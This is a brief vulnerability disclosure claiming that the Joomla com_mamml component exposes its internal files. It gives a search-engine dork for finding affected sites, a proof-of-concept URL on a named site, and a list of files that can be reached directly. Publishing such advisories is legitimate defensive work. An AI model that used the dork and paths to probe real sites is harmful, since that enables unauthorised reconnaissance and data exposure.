The Joomla Mamml component suffers from a remote file disclosure vulnerability.
ca73086df4954e539662b61da612ef1dfa520fb43cd594ee634b2912bcf86952
Joomla Component com_mamml Remote file upload&File disclosure vulnerability
By: e.wiZz!
In the wild....
Dork: allinurl:"com_mamml"
Bugs example:
www.inthewild.com/<PATH>/com_mamml/admin.mamml.html.inc
POC:
http://www.schmalls.com/update/0.4.10/administrator/components/com_mamml/admin.mamml.html.inc
Others:
admin.mamml.html.inc
admin.mamml.inc
classes/
configuration.inc
images/
install.mamml.inc
mamml.png
mamml.version.inc
mamml.xml
toolbar.mamml.html.inc
toolbar.mamml.inc
uninstall.mamml.inc